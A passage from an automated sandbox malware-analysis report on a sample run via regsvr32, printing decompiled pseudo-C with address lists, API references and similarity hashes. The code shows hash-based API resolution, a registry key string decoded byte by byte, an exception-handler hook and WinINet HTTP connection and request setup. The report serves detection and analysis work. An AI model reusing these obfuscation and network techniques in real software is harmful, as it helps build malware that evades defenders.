										if( *(_t426 + 0x2dc) == 0 || _t212 != 0) {
											L35:
											E00489510(_t426 + 0x280);
											E00478CA0(_t426 + 0x2b4);
											E00478CA0(_t426 + 0x2e0);
											E00478CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t390 =  *_t426;
												if(_t390 == 0 || _t390 == 0xffffffff) {
													_t197 = 1;
												} else {
													_t197 = 0;
												}
												if(_t197 == 0) {
													E0048CE70(_t390);
												}
											}
											 *_t426 = 0;
											E00478CA0(_t426 + 0x2cc);
											E00478CA0(_t426 + 0x2c4);
											return 0;
										} else {
											L44:
											E00489510(_t426 + 0x280);
											E00478CA0(_t426 + 0x2b4);
											E00478CA0(_t426 + 0x2e0);
											E00478CA0(_t426 + 0x10);
											if( *(_t426 + 4) != 0) {
												_t391 =  *_t426;
												if(_t391 == 0 || _t391 == 0xffffffff) {
													_t206 = 1;
												} else {
													_t206 = 0;
												}
												if(_t206 == 0) {
													E0048CE70(_t391);
												}
											}
											 *_t426 = 0;
											E00478CA0(_t426 + 0x2cc);
											E00478CA0(_t426 + 0x2c4);
											return 1;
										}
									}
								} else {
									goto L29;
								}
								goto L106;
								L28:
								asm("o16 nop [eax+eax]");
								_t67 = _t389 + 0x180; // 0x26d90a8
								_t389 =  *_t67;
							} while (_t389 != 0);
							goto L29;
						}
					}
				}
				goto L106;
			}

0x00476c5a
0x00476c65
0x00476c73
0x00476c7a
0x00476c7f
0x00476c89
0x0047735c
0x004774c4
0x004774ce
0x004774d0
0x004774d5
0x00477551
0x004774d7
0x004774d9
0x004774dd
0x004774e0
0x004774e3
0x004774ea
0x004774ed
0x004774f4
0x004774f7
0x004774fe
0x00477501
0x00477508
0x0047750b
0x00477512
0x00477515
0x0047751c
0x0047751f
0x00477526
0x00477529
0x00477530
0x00477533
0x00477538
0x0047753d
0x0047753d
0x00477540
0x00477544
0x00477549
0x0047754c
0x0047754c
0x0047754f
0x00477553
0x00477553
0x0047736e
0x00477380
0x00477385
0x00477391
0x004774b5
0x00000000
0x00477397
0x00477399
0x004773c8
0x004773cd
0x004773d3
0x004773d7
0x0047748c
0x00477497
0x0047749d
0x0047749d
0x0047748c
0x004773df
0x004773e8
0x004773f0
0x00000000
0x004773f0
0x0047739b
0x0047739d
0x0047739d
0x0047739f
0x004773a1
0x004773af
0x004773b0
0x004773b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004773b6
0x004774a4
0x004774aa
0x004773f2
0x004773f4
0x00477407
0x00477407
0x004774b0
0x00000000
0x004774b0
0x00000000
0x004773b8
0x004773b8
0x004773be
0x004773be
0x004773c4
0x00000000
0x0047739d
0x00477399
0x00477409
0x0047741b
0x00477426
0x00477426
0x0047742b
0x0047743b
0x00477447
0x00477447
0x0047744c
0x0047745c
0x0047746f
0x00477474
0x00476c8f
0x00476c95
0x004772bc
0x004772c6
0x004772c8
0x004772cd
0x00477349
0x004772cf
0x004772d1
0x004772d5
0x004772d8
0x004772db
0x004772e2
0x004772e5
0x004772ec
0x004772ef
0x004772f6
0x004772f9
0x00477300
0x00477303
0x0047730a
0x0047730d
0x00477314
0x00477317
0x0047731e
0x00477321
0x00477328
0x0047732b
0x00477330
0x00477335
0x00477335
0x00477338
0x0047733c
0x00477341
0x00477344
0x00477344
0x00477347
0x0047734b
0x0047734b
0x00476ca7
0x00476cb9
0x00476cbe
0x00476cca
0x004772ad
0x00000000
0x00476cd0
0x00476cd2
0x00476d01
0x00476d06
0x00476d0c
0x00476d10
0x00477284
0x0047728f
0x00477295
0x00477295
0x00477284
0x00476d18
0x00476d21
0x00476d29
0x00000000
0x00476d29
0x00476cd4
0x00476cd6
0x00476cd6
0x00476cd8
0x00476cda
0x00476ce8
0x00476ce9
0x00476cef
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00476cef
0x0047729c
0x004772a2
0x00476d2b
0x00476d2d
0x00476d40
0x00476d40
0x00000000
0x004772a8
0x00000000
0x004772a8
0x00000000
0x00476cf1
0x00476cf1
0x00476cf7
0x00476cf7
0x00476cfd
0x00000000
0x00476cd6
0x00476cd2
0x00476d42
0x00476d54
0x00476d5f
0x00476d5f
0x00476d64
0x00476d74
0x00476d80
0x00476d80
0x00476d85
0x00476d95
0x00476da8
0x00476dad
0x00476dad
0x00476db4
0x00476dc9
0x00476ddc
0x00476de1
0x00476df1
0x00476dfb
0x00476e09
0x00476e20
0x00476e27
0x00476e2e
0x00476e35
0x00476e3c
0x00476e47
0x00476e57
0x00476e6a
0x00476e6b
0x00476e70
0x00476e72
0x00476e77
0x00476e7c
0x00476e88
0x00476e98
0x00476ea4
0x00476eab
0x00476eae
0x00476eb3
0x00476eb7
0x00476ecb
0x00476ed0
0x00476edd
0x004771d9
0x004771dd
0x004771e7
0x004771e9
0x004771ee
0x004771f9
0x004771f5
0x004771f5
0x004771f5
0x00477200
0x00477203
0x00477203
0x00477200
0x00477208
0x00477216
0x00477222
0x00477233
0x00476ee3
0x00476ee3
0x00476ee9
0x00476eed
0x00476ef4
0x00476efe
0x00476f0b
0x00476f1e
0x00476f3a
0x00476f48
0x00476f4f
0x00000000
0x00000000
0x004771b8
0x004771c4
0x004771d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004771d3
0x00476f57
0x00476f6b
0x00476f80
0x00476f85
0x00476f9c
0x00476fa4
0x00476fb7
0x00476fc2
0x00476fd5
0x00476fdd
0x00476fe3
0x00476feb
0x00476fef
0x00476ff4
0x00476ffa
0x0047700b
0x00477269
0x00000000
0x00477011
0x00477013
0x00477042
0x00477047
0x0047704d
0x00477051
0x00477240
0x0047724b
0x00477251
0x00477251
0x00477240
0x00477059
0x00000000
0x0047705f
0x00477066
0x0047706e
0x00000000
0x0047706e
0x00477015
0x00477017
0x00477017
0x00477019
0x0047701b
0x00477029
0x0047702a
0x00477030
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00477030
0x00477258
0x0047725e
0x00477070
0x00477072
0x00477126
0x0047712e
0x00000000
0x00000000
0x00000000
0x00000000
0x00477078
0x00477093
0x0047709d
0x004770a7
0x004770ae
0x004770ba
0x004770c6
0x004770cf
0x004770d9
0x004770db
0x004770e0
0x004770eb
0x004770e7
0x004770e7
0x004770e7
0x004770f2
0x004770f5
0x004770f5
0x004770f2
0x004770fa
0x00477108
0x00477114
0x00477125
0x00477134
0x00477134
0x0047713b
0x00477147
0x00477153
0x0047715c
0x00477166
0x00477168
0x0047716d
0x00477178
0x00477174
0x00477174
0x00477174
0x0047717f
0x00477182
0x00477182
0x0047717f
0x00477187
0x00477195
0x004771a1
0x004771b5
0x004771b5
0x0047709d
0x00477264
0x00000000
0x00477264
0x00000000
0x00477032
0x00477032
0x00477038
0x00477038
0x0047703e
0x00000000
0x00477017
0x00477013
0x0047700b
0x00000000

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000000,?,00000000), ref: 00477093

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 060fd06e6d4cafb80a67de0d340cb20bdb3a2e5227411d5b500ff4c5a7871622
Instruction ID: a65984ec8852d0f7bf4ddecc824fbc57aff0e3e73f64d4e5a08903116b5d492b
Opcode Fuzzy Hash: 060fd06e6d4cafb80a67de0d340cb20bdb3a2e5227411d5b500ff4c5a7871622
Instruction Fuzzy Hash: 6D22C2302583419BD734FB25CC59BEF7395AF90308F90C92FA45D86292EF789909C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004939F9, Relevance: 1.7, APIs: 1, Instructions: 157filenetworkCOMMON

Download Yara Rule

APIs

InternetReadFile.WININET(?,00000000,00000000,00000000,00000000,D27F045A,547AC48E), ref: 00493B35

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: FileInternetRead
String ID:
API String ID: 778332206-0
Opcode ID: 6e5e1df4e98eec21a964b96b2977b968659d378df5d098b4896b8194c4584114
Instruction ID: 356dd7983fd823a4f97269a7560395c2c014f153f184231f48c5edae92334767
Opcode Fuzzy Hash: 6e5e1df4e98eec21a964b96b2977b968659d378df5d098b4896b8194c4584114
Instruction Fuzzy Hash: 335181312182009FD705FF25C852AAFB7A4AF91708F504C2EF59657192EF38AE09CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 004722A0, Relevance: 1.6, APIs: 1, Instructions: 69nativeCOMMON

Download Yara Rule

APIs

NtDelayExecution.NTDLL(00000000,00000000), ref: 0047233E

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: a01e2f9929420b3717f65eed5c26cea27efc8611567ddf67955520e33dbd049a
Instruction ID: 3426f14ac9c8facf48e7e99c538e32821fe5a2e7fb9325ba1bc604388b225086
Opcode Fuzzy Hash: a01e2f9929420b3717f65eed5c26cea27efc8611567ddf67955520e33dbd049a
Instruction Fuzzy Hash: E2110A30E086024BD728A7394E417AB32D6AF40714F29C66FDC0DDB386EA7CCC05829D

Uniqueness

Uniqueness Score: -1.00%

Function 00477A60, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00477D40,00477A11,588AB3EA,?,?,00465168,00000001), ref: 00477A67

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: d27c50d08d39dc65f515b339205b23853a3014f70b28b4e91fc5866424c471e9
Instruction ID: 79a1a2c954537c4b327d92ec1b11069a4ede1127803b0c736c80a849a9157bad
Opcode Fuzzy Hash: d27c50d08d39dc65f515b339205b23853a3014f70b28b4e91fc5866424c471e9
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 10002210, Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 361
registryCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E10002210() {
				long _v8;
				char* _v12;
				intOrPtr _v16;
				long _t374;
				intOrPtr _t536;

				_v16 = RegOpenKeyA;
				_v12 = "interface\\{b196b287-bab4-101a-b69c-00aa00341d07}";
				 *_v12 = 0x9c;
				 *_v12 = ( *_v12 & 0x000000ff) - 0x33;
				_v12[1] = 0xa1;
				_t9 =  &(_v12[1]); // 0x7265746e
				_v12[1] = ( *_t9 & 0x000000ff) - 0x33;
				_v12[2] = 0xa7;
				_t15 =  &(_v12[2]); // 0x66726574
				_v12[2] = ( *_t15 & 0x000000ff) - 0x33;
				_v12[3] = 0x98;
				_t21 =  &(_v12[3]); // 0x61667265
				_v12[3] = ( *_t21 & 0x000000ff) - 0x33;
				_v12[4] = 0xa5;
				_t27 =  &(_v12[4]); // 0x63616672
				_v12[4] = ( *_t27 & 0x000000ff) - 0x33;
				_v12[5] = 0x99;
				_t33 =  &(_v12[5]); // 0x65636166
				_v12[5] = ( *_t33 & 0x000000ff) - 0x33;
				_v12[6] = 0x94;
				_t39 =  &(_v12[6]); // 0x5c656361
				_v12[6] = ( *_t39 & 0x000000ff) - 0x33;
				_v12[7] = 0x96;
				_t45 =  &(_v12[7]); // 0x7b5c6563
				_v12[7] = ( *_t45 & 0x000000ff) - 0x33;
				_v12[8] = 0x98;
				_t51 =  &(_v12[8]); // 0x627b5c65
				_v12[8] = ( *_t51 & 0x000000ff) - 0x33;
				_v12[9] = 0x8f;
				_t57 =  &(_v12[9]); // 0x31627b5c
				_v12[9] = ( *_t57 & 0x000000ff) - 0x33;
				_v12[0xa] = 0xae;
				_t63 =  &(_v12[0xa]); // 0x3931627b
				_v12[0xa] = ( *_t63 & 0x000000ff) - 0x33;
				_v12[0xb] = 0x95;
				_t69 =  &(_v12[0xb]); // 0x36393162
				_v12[0xb] = ( *_t69 & 0x000000ff) - 0x33;
				_v12[0xc] = 0x64;
				_t75 =  &(_v12[0xc]); // 0x62363931
				_v12[0xc] = ( *_t75 & 0x000000ff) - 0x33;
				_v12[0xd] = 0x6c;
				_t81 =  &(_v12[0xd]); // 0x32623639
				_v12[0xd] = ( *_t81 & 0x000000ff) - 0x33;
				_v12[0xe] = 0x69;
				_t87 =  &(_v12[0xe]); // 0x38326236
				_v12[0xe] = ( *_t87 & 0x000000ff) - 0x33;
				_v12[0xf] = 0x95;
				_t93 =  &(_v12[0xf]); // 0x37383262
				_v12[0xf] = ( *_t93 & 0x000000ff) - 0x33;
				_v12[0x10] = 0x65;
				_v12[0x10] = (_v12[0x10] & 0x000000ff) - 0x33;
				_v12[0x11] = 0x6b;
				_v12[0x11] = (_v12[0x11] & 0x000000ff) - 0x33;
				_v12[0x12] = 0x6a;
				_v12[0x12] = (_v12[0x12] & 0x000000ff) - 0x33;
				_v12[0x13] = 0x60;
				_v12[0x13] = (_v12[0x13] & 0x000000ff) - 0x33;
				_v12[0x14] = 0x95;
				_v12[0x14] = (_v12[0x14] & 0x000000ff) - 0x33;
				_v12[0x15] = 0x94;
				_v12[0x15] = (_v12[0x15] & 0x000000ff) - 0x33;
				_v12[0x16] = 0x95;
				_v12[0x16] = (_v12[0x16] & 0x000000ff) - 0x33;
				_v12[0x17] = 0x67;
				_v12[0x17] = (_v12[0x17] & 0x000000ff) - 0x33;
				_v12[0x18] = 0x60;
				_v12[0x18] = (_v12[0x18] & 0x000000ff) - 0x33;
				_v12[0x19] = 0x64;
				_v12[0x19] = (_v12[0x19] & 0x000000ff) - 0x33;
				_v12[0x1a] = 0x63;
				_v12[0x1a] = (_v12[0x1a] & 0x000000ff) - 0x33;
				_v12[0x1b] = 0x64;
				_v12[0x1b] = (_v12[0x1b] & 0x000000ff) - 0x33;
				_v12[0x1c] = 0x94;
				_v12[0x1c] = (_v12[0x1c] & 0x000000ff) - 0x33;
				_v12[0x1d] = 0x60;
				_v12[0x1d] = (_v12[0x1d] & 0x000000ff) - 0x33;
				_v12[0x1e] = 0x95;
				_v12[0x1e] = (_v12[0x1e] & 0x000000ff) - 0x33;
				_v12[0x1f] = 0x69;
				_v12[0x1f] = (_v12[0x1f] & 0x000000ff) - 0x33;
				_v12[0x20] = 0x6c;
				_v12[0x20] = (_v12[0x20] & 0x000000ff) - 0x33;
				_v12[0x21] = 0x96;
				_v12[0x21] = (_v12[0x21] & 0x000000ff) - 0x33;
				_v12[0x22] = 0x60;
				_v12[0x22] = (_v12[0x22] & 0x000000ff) - 0x33;
				_v12[0x23] = 0x63;
				_v12[0x23] = (_v12[0x23] & 0x000000ff) - 0x33;
				_v12[0x24] = 0x63;
				_v12[0x24] = (_v12[0x24] & 0x000000ff) - 0x33;
				_v12[0x25] = 0x94;
				_v12[0x25] = (_v12[0x25] & 0x000000ff) - 0x33;
				_v12[0x26] = 0x94;
				_v12[0x26] = (_v12[0x26] & 0x000000ff) - 0x33;
				_v12[0x27] = 0x63;
				_v12[0x27] = (_v12[0x27] & 0x000000ff) - 0x33;
				_v12[0x28] = 0x63;
				_v12[0x28] = (_v12[0x28] & 0x000000ff) - 0x33;
				_v12[0x29] = 0x66;
				_v12[0x29] = (_v12[0x29] & 0x000000ff) - 0x33;
				_v12[0x2a] = 0x67;
				_v12[0x2a] = (_v12[0x2a] & 0x000000ff) - 0x33;
				_v12[0x2b] = 0x64;
				_v12[0x2b] = (_v12[0x2b] & 0x000000ff) - 0x33;
				_v12[0x2c] = 0x97;
				_v12[0x2c] = (_v12[0x2c] & 0x000000ff) - 0x33;
				_v12[0x2d] = 0x63;
				_v12[0x2d] = (_v12[0x2d] & 0x000000ff) - 0x33;
				_v12[0x2e] = 0x6a;
				_v12[0x2e] = (_v12[0x2e] & 0x000000ff) - 0x33;
				_v12[0x2f] = 0xb0;
				_v12[0x2f] = (_v12[0x2f] & 0x000000ff) - 0x33;
				E100010E0(_v12);
				_t536 =  *0x10008000; // 0x80074ea8
				_t374 = RegOpenKeyA(_t536 - 0x74ea8, _v12, 0x10009b20);
				_v8 = _t374;
				if(_v8 != 0) {
					while(1) {
						_t374 = 1;
						if(1 == 0) {
							goto L4;
						}
					}
				}
				L4:
				return _t374;
			}

0x1000221b
0x1000221e
0x10002228
0x10002237
0x1000223c
0x10002243
0x1000224d
0x10002253
0x1000225a
0x10002264
0x1000226a
0x10002271
0x1000227b
0x10002281
0x10002288
0x10002292
0x10002298
0x1000229f
0x100022a9
0x100022af
0x100022b6
0x100022c0
0x100022c6
0x100022cd
0x100022d7
0x100022dd
0x100022e4
0x100022ee
0x100022f4
0x100022fb
0x10002305
0x1000230b
0x10002312
0x1000231c
0x10002322
0x10002329
0x10002333
0x10002339
0x10002340
0x1000234a
0x10002350
0x10002357
0x10002361
0x10002367
0x1000236e
0x10002378
0x1000237e
0x10002385
0x1000238f
0x10002395
0x100023a6
0x100023ac
0x100023bd
0x100023c3
0x100023d4
0x100023da
0x100023eb
0x100023f1
0x10002402
0x10002408
0x10002419
0x1000241f
0x10002430
0x10002436
0x10002447
0x1000244d
0x1000245e
0x10002464
0x10002475
0x1000247b
0x1000248c
0x10002492
0x100024a3
0x100024a9
0x100024ba
0x100024c0
0x100024d1
0x100024d7
0x100024e8
0x100024ee
0x100024ff
0x10002505
0x10002516
0x1000251c
0x1000252d
0x10002533
0x10002544
0x1000254a
0x1000255b
0x10002561
0x10002572
0x10002578
0x10002589
0x1000258f
0x100025a0
0x100025a6
0x100025b7
0x100025bd
0x100025ce
0x100025d4
0x100025e5
0x100025eb
0x100025fc
0x10002602
0x10002613
0x10002619
0x1000262a
0x10002630
0x10002641
0x10002647
0x10002658
0x1000265e
0x1000266f
0x10002672
0x10002682
0x1000268f
0x10002692
0x10002699
0x1000269b
0x1000269b
0x100026a2
0x00000000
0x00000000
0x100026a4
0x1000269b
0x100026a9
0x100026a9

APIs

RegOpenKeyA.ADVAPI32(80000000,00000065,10009B20), ref: 1000268F

Strings

interface\{b196b287-bab4-101a-b69c-00aa00341d07}, xrefs: 1000221E

Memory Dump Source

Source File: 00000004.00000002.2386194145.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2386186538.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2386201334.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2386206956.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2386213840.000000001000A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Open
String ID: interface\{b196b287-bab4-101a-b69c-00aa00341d07}
API String ID: 71445658-3721302963
Opcode ID: ef6c4da65b10fadbfc1a9c8259642f840c53d49d67171aaa58f6ee99606117db
Instruction ID: c75d1b7c680cd7929e65673bb8228a40b312d719cd78d8ad229c9128e59891e9
Opcode Fuzzy Hash: ef6c4da65b10fadbfc1a9c8259642f840c53d49d67171aaa58f6ee99606117db
Instruction Fuzzy Hash: 7912FB35A083C99FCB05CFA8C19499CFFB26F56220F1882C9D4D56B387C671D696CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00471030, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36
memoryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00471030() {
				void* _v20;
				void* _t4;
				intOrPtr* _t9;
				void* _t11;

				if( *0x49b1e0 == 0xe99c89bf) {
					_t9 = E004715C0(0x588ab3ea, 0xc0b67de0);
					 *0x49b1e4 = E004715C0(0x588ab3ea, 0x82d274c4);
					if( *0x49b1e0 == 0xe99c89bf) {
						 *_t9(2, 0, 0, 0, 0, 0); // executed
						 *0x49b1e0 = 0;
					}
				}
				_t4 = E004715C0(0x588ab3ea, 0x996e050f);
				if(_t4 == 0) {
					return 0;
				} else {
					_t1 = _t11 + 8; // 0x476c6a
					_push( *_t1);
					_push(8);
					_push( *0x49b1e0);
					asm("int3");
					return _t4;
				}
			}

0x0047103b
0x00471073
0x00471084
0x00471093
0x0047109e
0x004710a0
0x004710a0
0x00471093
0x00471047
0x0047104e
0x00471063
0x00471050
0x00471050
0x00471050
0x00471054
0x00471056
0x0047105c
0x0047105d
0x0047105d

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,588AB3EA,82D274C4,588AB3EA,C0B67DE0,?,00478864,00000000,00000000,00000000,?), ref: 0047109E

Strings

jlG, xrefs: 00471050

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: CreateHeap
String ID: jlG
API String ID: 10892065-2616289148
Opcode ID: 88b444bec7d51a0fb24134e592759069a8d526e4570513dbf4c60eea44fa5dc4
Instruction ID: d3dabfe0086f3256cfa7bf41d842f73499820df9bfbd604e8bd79aa84bd14152
Opcode Fuzzy Hash: 88b444bec7d51a0fb24134e592759069a8d526e4570513dbf4c60eea44fa5dc4
Instruction Fuzzy Hash: BEF0A738000285BEE3209F796E1BABA36D4EB107D4F00843BF50D945B1FF288550835E

Uniqueness

Uniqueness Score: -1.00%

Function 00493370, Relevance: 3.4, APIs: 2, Instructions: 366
networkCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00493370(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t102;
				signed int _t109;
				signed int _t118;
				signed int _t119;
				intOrPtr* _t128;
				signed int _t129;
				intOrPtr _t151;
				signed int _t153;
				signed int _t154;
				intOrPtr _t155;
				void* _t158;
				WCHAR* _t160;
				signed int _t161;
				signed int _t162;
				signed int _t163;
				void* _t164;
				signed int _t165;
				WCHAR* _t166;
				void* _t167;
				void* _t169;
				short _t172;
				signed int _t174;
				signed int _t177;
				signed int _t179;
				signed int _t180;
				signed int _t181;
				signed int _t209;
				signed int _t226;
				signed int _t228;
				signed int _t229;
				intOrPtr _t230;
				signed int _t240;
				void* _t241;
				WCHAR* _t244;
				intOrPtr* _t249;
				void* _t253;
				short* _t254;

				_t254 = _t253 - 0x60;
				_t244 = 0;
				_t249 = __ecx;
				 *_t254 = 0;
				E004806A0( &(_t254[4]), __ecx, 0);
				E004806A0( &(_t254[8]), __ecx, 0);
				E004806A0( &(_t254[0xc]), __ecx, 0);
				E004806A0( &(_t254[0x10]), __ecx, 0);
				E00494D50( &(_t254[2]),  *(_t254[0x3a]));
				_t172 =  *_t254;
				E00478810( &(_t254[0x1e]), 0);
				E004787A0( &(_t254[0x20]));
				E004787A0( &(_t254[0x24]));
				_t102 = E00480220( &(_t254[0x20]), _t254[0x26], 0);
				E004787A0( &(_t254[0x28]));
				E00480220(_t102, _t254[0x2a], 0);
				E00478CA0( &(_t254[0x28]));
				E00478CA0( &(_t254[0x24]));
				if(E00481000( &(_t254[2])) == 0) {
					_t242 = _t254[2];
					_t169 = E0048D620(_t242, E00486040(_t254[2], 0x7fffffff));
					if(_t169 != 0x97780db2) {
						__eflags = _t169 - 0x3ef665a6;
						if(_t169 == 0x3ef665a6) {
							 *(_t249 + 0x18) = 1;
						}
					} else {
						 *(_t249 + 0x18) = 0;
					}
				}
				if(E004715C0(0xd27f045a, 0xe214cde) == 0) {
					__eflags =  *((char*)(_t249 + 0xc));
					if( *((char*)(_t249 + 0xc)) == 0) {
						L71:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = 0;
						goto L17;
					} else {
						_t180 =  *(_t249 + 8);
						__eflags = _t180;
						if(_t180 == 0) {
							L67:
							_t162 = 1;
						} else {
							__eflags = _t180 - 0xffffffff;
							if(_t180 == 0xffffffff) {
								goto L67;
							} else {
								_t162 = _t244;
							}
						}
						__eflags = _t162;
						if(_t162 != 0) {
							goto L71;
						} else {
							_t163 = E004715C0(0xd27f045a, 0xdda3415f);
							__eflags = _t163;
							if(_t163 == 0) {
								goto L71;
							} else {
								_push(_t180);
								asm("int3");
								return _t163;
							}
						}
					}
				} else {
					_t164 =  *0x49b248; // 0xcc0004
					_t165 = InternetConnectW(_t164, _t254[0x2c], _t172, _t244, _t244, 3, _t244, _t244); // executed
					_t181 = _t165;
					if( *((char*)(_t249 + 0xc)) == 0) {
						L14:
						 *((char*)(_t249 + 0xc)) = 1;
						 *(_t249 + 8) = _t181;
						__eflags = _t181;
						if(_t181 == 0) {
							L17:
							_t109 = 1;
						} else {
							__eflags = _t181 - 0xffffffff;
							if(_t181 == 0xffffffff) {
								goto L17;
							} else {
								_t109 = _t244;
							}
						}
						__eflags = _t109;
						if(_t109 != 0) {
							 *_t249 = E00477F00();
							E00478CA0( &(_t254[0x20]));
							E00478CA0( &(_t254[0x1c]));
							E00480B10( &(_t254[0xe]));
							E00480B10( &(_t254[0xa]));
							E00480B10( &(_t254[6]));
							E00480B10( &(_t254[2]));
							__eflags = 0;
							return 0;
						} else {
							__eflags =  *(_t249 + 0x18) - 1;
							if( *(_t249 + 0x18) == 1) {
								_t254[0x2c] = 0x80a03200;
							} else {
								_t254[0x2c] = 0x80203200;
							}
							_t118 = E004715C0(0xd27f045a, 0x8813e141);
							__eflags = _t118;
							if(_t118 == 0) {
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L62:
									 *((char*)(_t249 + 0x14)) = 1;
									_t174 = _t244;
									 *(_t249 + 0x10) = 0;
									goto L34;
								} else {
									_t177 =  *(_t249 + 0x10);
									__eflags = _t177;
									if(_t177 == 0) {
										L58:
										_t153 = 1;
									} else {
										__eflags = _t177 - 0xffffffff;
										if(_t177 == 0xffffffff) {
											goto L58;
										} else {
											_t153 = _t244;
										}
									}
									__eflags = _t153;
									if(_t153 != 0) {
										goto L62;
									} else {
										_t154 = E004715C0(0xd27f045a, 0xdda3415f);
										__eflags = _t154;
										if(_t154 == 0) {
											goto L62;
										} else {
											_push(_t177);
											asm("int3");
											return _t154;
										}
									}
								}
							} else {
								_t155 =  *((intOrPtr*)(_t249 + 0x1c));
								__eflags = _t155 - 1;
								_t156 =  !=  ? _t244 : _t155;
								E00477B30(_t155 - 1,  &(_t254[0x18]), 0x49aa40,  !=  ? _t244 : _t155);
								_t158 = HttpOpenRequestW( *(_t249 + 8), _t254[0x24], _t254[0x26], _t244, _t244, _t244, _t254[0x2e], _t244); // executed
								_t179 = _t158;
								__eflags =  *((char*)(_t249 + 0x14));
								if( *((char*)(_t249 + 0x14)) == 0) {
									L31:
									 *(_t249 + 0x10) = _t179;
									 *((char*)(_t249 + 0x14)) = 1;
									E00478CA0( &(_t254[0x18]));
									_t174 =  *(_t249 + 0x10);
									__eflags = _t174;
									if(_t174 == 0) {
										L34:
										_t119 = 1;
									} else {
										__eflags = _t174 - 0xffffffff;
										if(_t174 == 0xffffffff) {
											goto L34;
										} else {
											_t119 = _t244;
										}
									}
									__eflags = _t119;
									if(_t119 != 0) {
										 *_t249 = E00477F00();
										E00478CA0( &(_t254[0x20]));
										E00478CA0( &(_t254[0x1c]));
										E00480B10( &(_t254[0xe]));
										E00480B10( &(_t254[0xa]));
										E00480B10( &(_t254[6]));
										E00480B10( &(_t254[2]));
										__eflags = 0;
										return 0;
									} else {
										_t128 =  *0x49b244; // 0xb7b294eb
										__eflags = _t128 - 0xb7b294eb;
										if(_t128 != 0xb7b294eb) {
											E00492760( &(_t254[0x18]),  *_t128, 0xffffffff);
											_t151 =  *0x49b27c; // 0x0
											while(1) {
												__eflags =  *(_t151 + _t244 * 8);
												if( *(_t151 + _t244 * 8) == 0) {
													break;
												}
												_t244 =  &(_t244[0]);
												__eflags = _t244 - 0x1000;
												if(_t244 < 0x1000) {
													continue;
												}
												L40:
												E00492810(_t151,  &(_t254[0x14]));
												goto L41;
											}
											 *(_t151 + _t244 * 8) = _t174;
											_t151 = E004710E0(0);
											_t230 =  *0x49b27c; // 0x0
											 *((intOrPtr*)(_t230 + 4 + _t244 * 8)) = _t151;
											goto L40;
										}
										L41:
										_t129 =  *(_t249 + 0x40);
										__eflags = _t129;
										if(_t129 != 0) {
											_t254[0x12] = _t129 * 0x3e8;
											_t228 = E004715C0(0xd27f045a, 0x863455c4);
											__eflags = _t228;
											if(_t228 != 0) {
												 *_t228( *(_t249 + 0x10), 5,  &(_t254[0x12]), 4);
											}
											_t229 = E004715C0(0xd27f045a, 0x863455c4);
											__eflags = _t229;
											if(_t229 != 0) {
												 *_t229( *(_t249 + 0x10), 6,  &(_t254[0x12]), 4);
											}
										}
										_t254[0x2e] = 4;
										_t209 = E004715C0(0xd27f045a, 0x9217c72);
										__eflags = _t209;
										if(_t209 != 0) {
											 *_t209( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]),  &(_t254[0x2e]));
										}
										_t254[0x2c] = _t254[0x2c] | 0x00003380;
										_t226 = E004715C0(0xd27f045a, 0x863455c4);
										__eflags = _t226;
										if(_t226 != 0) {
											 *_t226( *(_t249 + 0x10), 0x1f,  &(_t254[0x2c]), _t254[0x2e]);
										}
										E00478CA0( &(_t254[0x20]));
										E00478CA0( &(_t254[0x1c]));
										E00480B10( &(_t254[0xe]));
										E00480B10( &(_t254[0xa]));
										E00480B10( &(_t254[6]));
										E00480B10( &(_t254[2]));
										return 1;
									}
